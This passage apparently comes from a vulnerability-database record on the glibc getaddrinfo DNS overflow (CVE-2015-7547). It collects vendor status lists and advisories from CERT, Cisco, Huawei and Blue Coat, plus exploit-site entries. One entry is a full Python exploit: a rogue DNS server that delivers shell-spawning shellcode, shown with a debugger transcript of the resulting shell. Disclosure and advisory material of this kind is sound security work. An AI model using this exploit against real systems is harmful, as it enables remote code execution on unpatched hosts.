statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Infoblox Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### JH Software Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks __ Unknown\n\nNotified: February 17, 2016 Updated: February 22, 2016 \n\n**Statement Date: February 19, 2016**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has provided the following list. A statement is available at the URL below.\n\nThe following products have been confirmed to be not vulnerable to the glibc issue reported as CVE-2015-7547: \n\n\n * \u200b\u200b\u200b\u200b\u200bJunos OS does not use glibc and is not affected by this issue. \nNote: Linux VM-based platforms (e.g. vSRX, vMX, etc.) include glibc, but do not make use of DNS client libraries during normal operation. \n\n * \u200b\u200bJunos Space \n\n * ScreenOS uses a different implementation of libc and is not affected by this issue. \n\n * QFabric Director \n\n * \u200bJUNOSe \n\n * CTP and CTPView \n\n * NSM server relies on underlying OS glibc library. Contact OS vendor \n\n * SBR Carrier running on RHEL relies on the glibc library shipped with the OS. Customers should contact the OS vendor to upgrade glibc.\n * SBR Carrier running on Solaris is not vulnerable as it does not use this library. \n\n * \u200bWX/WXC \n\n * Netscreen IDP\nOther products are still under investigation.\u200b\n\n### Vendor References\n\n * <http://forums.juniper.net/t5/Security-Incident-Response/glibc-getaddrinfo-stack-based-buffer-overflow-CVE-2015-7547/ba-p/288261>\n\n### Lynx Software Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### McAfee Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microsoft Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NLnet Labs Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nominum Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenDNS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Peplink Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### PowerDNS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SUSE Linux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Secure64 Software Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### VMware Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xilinx Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### dnsmasq Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### gdnsd Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 92 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.1 | E:POC/RL:TF/RC:C \nEnvironmental | 8.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=18665>\n * <https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>\n * <https://sourceware.org/glibc/wiki/Glibc%20Timeline>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Fermin J. Serna and Kevin Stadmeyer of Google and Florian Weimer and Carlos O\ud840\udd9donell of Red Hat. Google thanks: \"Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O\ud840\udd9donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.\"\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-7547](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-7547>) \n---|--- \n**Date Public:** | 2016-02-16 \n**Date First Published:** | 2016-02-17 \n**Date Last Updated: ** | 2016-03-14 14:25 UTC \n**Document Revision: ** | 52 \n", "modified": "2016-03-14T14:25:00", "published": "2016-02-17T00:00:00", "id": "VU:457759", "href": "https://www.kb.cert.org/vuls/id/457759", "type": "cert", "title": "glibc vulnerable to stack buffer overflow in DNS resolver", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2020-12-24T11:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "A vulnerability in the libresolv library in GNC glibc could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition.\n\nThe vulnerability is due to insufficient validation of user-supplied input by the affected software when the getaddrinfo function is used while performing dual A/AAAA DNS queries. An attacker could exploit this vulnerability by sending a crafted DNS response to a targeted system. An exploit could trigger a stack-based buffer overflow condition that the attacker could leverage to execute arbitrary code or cause a DoS condition.\n\nOn February 16, 2016, an industry-wide, critical vulnerability in the GNU C library (glibc) was publicly disclosed.\n\nMultiple Cisco products incorporate a version of glibc that may be affected by the vulnerability. The vulnerability could allow an unauthenticated, remote attacker to trigger a buffer overflow condition that may result in a denial of service (DoS) condition or allow the attacker to execute arbitrary code on an affected device.\n\nCisco will release software updates that address this vulnerability.\n\nWorkarounds that address this vulnerability are not available.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc\"]", "modified": "2017-02-13T18:20:55", "published": "2016-02-18T20:22:00", "id": "CISCO-SA-20160218-GLIBC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc", "type": "cisco", "title": "Vulnerability in GNU glibc Affecting Cisco Products: February 2016", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-05T03:09:49", "description": "Exploit for linux platform in category remote exploits", "edition": 2, "published": "2016-09-06T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "1337DAY-ID-24769", "href": "https://0day.today/exploit/description/24769", "sourceData": "/*\r\n \r\nadd by [email\u00a0protected] (jang kyoung chip)\r\n \r\nThis is a published vulnerability by google in the past.\r\nPlease refer to the link below.\r\n \r\nReference: \r\n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\n- https://github.com/fjserna/CVE-2015-7547\r\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \r\n \r\nWhen Google announced about this code(vulnerability), \r\nit was missing information on shellcode.\r\nSo, I tried to completed the shellcode.\r\nIn the future, I hope to help your study.\r\n \r\n \r\n(gdb) r\r\nStarting program: /home/haker/client1 \r\nGot object file from memory but can't read symbols: File truncated.\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60259\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1\r\nTCP Connected with 127.0.0.1:60260\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\u00ef\u00bf\u00bd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\nprocess 6415 is executing new program: /bin/dash\r\n$ id\r\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\r\n$ \r\n \r\n*/\r\n \r\n \r\n \r\n \r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n \r\nIP = '192.168.111.5' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n \r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n \r\n \r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n \r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n \r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n \r\ndef db(x):\r\n return chr(x)\r\n \r\ndef udp_thread():\r\n global terminate\r\n \r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n \r\n reply_counter = 0\r\n counter = -1\r\n \r\n answers = []\r\n \r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n \r\n # Send truncated flag... so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n \r\n answers.append((data, addr))\r\n \r\n if len(answers) != 2:\r\n continue\r\n \r\n counter += 1\r\n \r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n \r\n \r\n print 'udp send '\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n \r\n print 'sendto 1 '\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n print 'sendto 2 '\r\n \r\n sock_udp.close()\r\n \r\n \r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n \r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n \r\n print 'a'\r\n \r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\r\n \r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n \r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n \r\n print 'data1 = ' +data1\r\n \r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n \r\n print 'query = ' + query1\r\n \r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n \r\n \r\n \r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n \r\n \r\n \r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n \r\n data += answer\r\n \r\n data1_reply = dw(len(data)) + data\r\n \r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'A' * (6)\r\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += '\\x90' * (44)\r\n data += '\\x90' * (1955)\r\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\r\n data += '\\x90' * (100)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'F' * (8)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'G' * (134)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n \r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n print 'data1_reply'\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n print 'data2_reply'\r\n \r\n reply_now.clear()\r\n \r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n \r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24769"}, {"lastseen": "2018-01-01T05:06:57", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2016-02-16T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "href": "https://0day.today/exploit/description/25827", "id": "1337DAY-ID-25827", "sourceData": "Sources: \r\nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\nhttps://github.com/fjserna/CVE-2015-7547\r\n \r\nTechnical information:\r\n \r\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\r\n \r\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\r\n \r\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\r\n \r\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\r\n \r\nWe are providing this code as-is. You are responsible for protecting yourself,\r\nyour property and data, and others from any risks caused by this code. This\r\ncode may cause unexpected and undesirable behavior to occur on your machine.\r\nThis code may not detect the vulnerability on your system.\r\n \r\nNote that this POC consists of two components: server code and client code.\r\nThe server code triggers the vulnerability and therefore will crash the client\r\ncode. Note also that it is necessary to set the nameserver to point to the\r\nserver code, and doing so could cause other programs that call into the\r\ngetaddrinfo() function to crash while testing is underway. This POC code is\r\nprovided \"as is\" with no warranties, whether express or implied, including\r\nwithout limitation any warranties or merchantability, fitness for a particular\r\nuse and noninfringement. Google assumes no responsibility for your proper\r\ninstallation and use of the POC code.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25827", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "huawei": [{"lastseen": "2016-09-05T13:35:30", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Google security research team disclosed a buffer overflow vulnerability in GNU C library (glibc) (CVE-2015-7547) on February 16, 2016, remote attackers can exploit the vulnerability to execute arbitrary code on an affected device. (Vulnerability ID: HWPSIRT-2016-02018) \nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2015-7547\u00a0\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link: \nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160304-01-glibc-en", "modified": "2016-05-10T00:00:00", "published": "2016-03-04T00:00:00", "id": "HUAWEI-SA-20160304-01-GLIBC-EN", "href": "http://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160304-01-glibc-en", "type": "huawei", "title": "Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-01T18:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2016-12-28T00:00:00", "published": "2016-03-04T00:00:00", "id": "HUAWEI-SA-20160304-01-GLIBC", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160304-01-glibc-en", "title": "Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability", "type": "huawei", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "symantec": [{"lastseen": "2021-03-14T10:41:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "### SUMMARY\n\n \n\n\nBlue Coat products using an affected version of the GNU C Library (glibc) are susceptible to a remote execution attack. A remote attacker can send a crafted DNS response to the glibc DNS resolver and cause the resolver to crash or execute arbitrary code.\n\n### AFFECTED PRODUCTS\n\n \n\n\nThe following products are vulnerable:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.6 | Upgrade to 6.6.4.1. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.3 | Upgrade to 1.3.6.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 4.2 | Upgrade to 4.2.8. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.6 and later | Not vulnerable, fixed in 1.6.1.1 \n1.5 | Upgrade to 1.5.3.1. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | Upgrade to 5.3.6. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 11.6 and later | Not vulnerable, fixed in 11.6.1.1 \n11.5 | Upgrade to 11.5.3.1. \n11.2, 11.3, 11.4 | Upgrade to later release with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 1.1 | Upgrade to 1.1.2.1. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 10.1 | Upgrade to 10.1.4.1. \n9.4, 9.5 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.2 | Not vulnerable, fixed in 7.2.1 \n7.1 | Upgrade to 7.1.11. \n7.0 | Upgrade to later release with fixes. \n6.6 | Upgrade to 6.6.12. \n \n \n\n**SSL Visibility** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 3.9 | Upgrade to 3.9.3.3. \n3.8.4FC | Upgrade to 3.8.4FC-55. \n3.8 | Upgrade to 3.8.6-14. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 11.0 | Upgrade to 11.0.2. \n10.0 | Upgrade to 10.0.6. \n9.7 | Not vulnerable \n \n### ADDITIONAL PRODUCT INFORMATION\n\n \n\n\nBlue Coat products that use a native installation of glibc, but do not install or maintain that implementation are not vulnerable. However, the underlying platform that provides the glibc library may be vulnerable. Blue Coat urges our customers to update the versions of glibc that are natively installed for Client Connector, ProxyClient, and Reporter 9.x for Linux.\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Transfer Defense \nPacketShaper \nPolicyCenter \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP.\n\n### ISSUES\n\n \n\n\nThe stack-based buffer overflow exists in the glibc client DNS resolver implementation (libresolv) when invoked from the libnss_dns module. The buffer overflow occurs in the libnss_dns send_dg() and send_vc() functions when a userspace application resolves a DNS name by calling getaddrinfo() with the AF_UNSPEC parameter. The AF_UNSPEC parameter does not tell the resolver 